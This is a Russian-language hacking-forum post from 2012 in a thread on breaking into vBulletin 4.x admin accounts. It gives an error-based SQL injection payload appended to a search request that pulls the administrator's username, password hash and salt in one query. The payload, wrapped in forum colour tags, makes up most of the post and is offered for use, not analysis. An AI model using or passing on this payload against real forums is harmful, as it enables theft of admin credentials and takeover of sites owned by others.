Тема: Взлом vBulletin 4.x.x с последующией авторизацией в админский аккаунт
Показать сообщение отдельно

  #9  
Старый 09.04.2012, 18:04
Pirotexnik
Guest
Сообщений: n/a
Провел на форуме:
97332

Репутация: 38
По умолчанию
Модифицировал запрос.

Извлекаем логин, хэш и соль ОДНИМ запросом!

Первыая скуль с поиском:

Ловим запрос, посли нашего текста добавляем следующее:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]
humanverify[/COLOR][COLOR="#007700"][]=&[/COLOR][COLOR="#0000BB"]searchfromtype[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]vBForum[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]3ASocialGroupMessage[/COLOR][COLOR="#007700"]&do=[/COLOR][COLOR="#0000BB"]process[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]contenttypeid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]categoryid[/COLOR][COLOR="#007700"][]=-[/COLOR][COLOR="#0000BB"]99[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]union select password from user where userid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]row[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])>([/COLOR][COLOR="#0000BB"]select count[/COLOR][COLOR="#007700"](*),[/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"]( ([/COLOR][COLOR="#0000BB"]select concat_ws[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x3a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]password[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]salt[/COLOR][COLOR="#007700"])) ,[/COLOR][COLOR="#0000BB"]0x3a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]floor[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]x from[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]select 1 union select 2 union select 3[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]a group by x limit 1[/COLOR][COLOR="#007700"]) --[/COLOR][COLOR="#FF8000"]/*

[/COLOR][/COLOR] 
В слове "salt" форум вставляет пробелы.

В исходнике будет LOGIN:HASH:SALT!

p.s. добавте в шапку.
 
Ответить с цитированием